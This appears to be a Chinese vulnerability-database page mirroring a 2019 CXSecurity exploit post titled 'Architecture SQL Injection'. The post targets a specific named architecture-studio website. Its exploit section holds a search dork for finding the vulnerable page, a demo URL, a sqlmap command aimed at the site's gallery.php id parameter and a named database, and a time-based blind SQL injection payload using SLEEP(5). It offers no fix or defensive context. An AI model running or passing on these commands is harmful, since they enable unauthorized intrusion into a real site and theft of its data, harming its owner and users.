Architecture SQL Injection - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1615727 漏洞类型
发布时间 2019-05-20 更新时间 2019-05-20
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019050212
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title:Architecture SQL Injection
-------------------------------------------------------------------------------------------------------------------------------------------------
# Date:17.05.2019
-------------------------------------------------------------------------------------------------------------------------------------------------
# Dork :site:www.atelierdsync.com  id=
-------------------------------------------------------------------------------------------------------------------------------------------------
# Exploit Author:Cerkuday
-------------------------------------------------------------------------------------------------------------------------------------------------

# Tested on:Windows &Kali Linux
//////////////////////////////////////////////////////////////////////////


#Demo:
http://www.atelierdsync.com/gallery.php?id=12


# Poc:
sqlmap.py -u "http://www.atelierdsync.com/gallery.php?id=12"    --random-agent -D livelkpq_atelier_dsync

http://www.atelierdsync.com/gallery.php?id=12' AND SLEEP(5) AND 'XFuZ'='XFuZ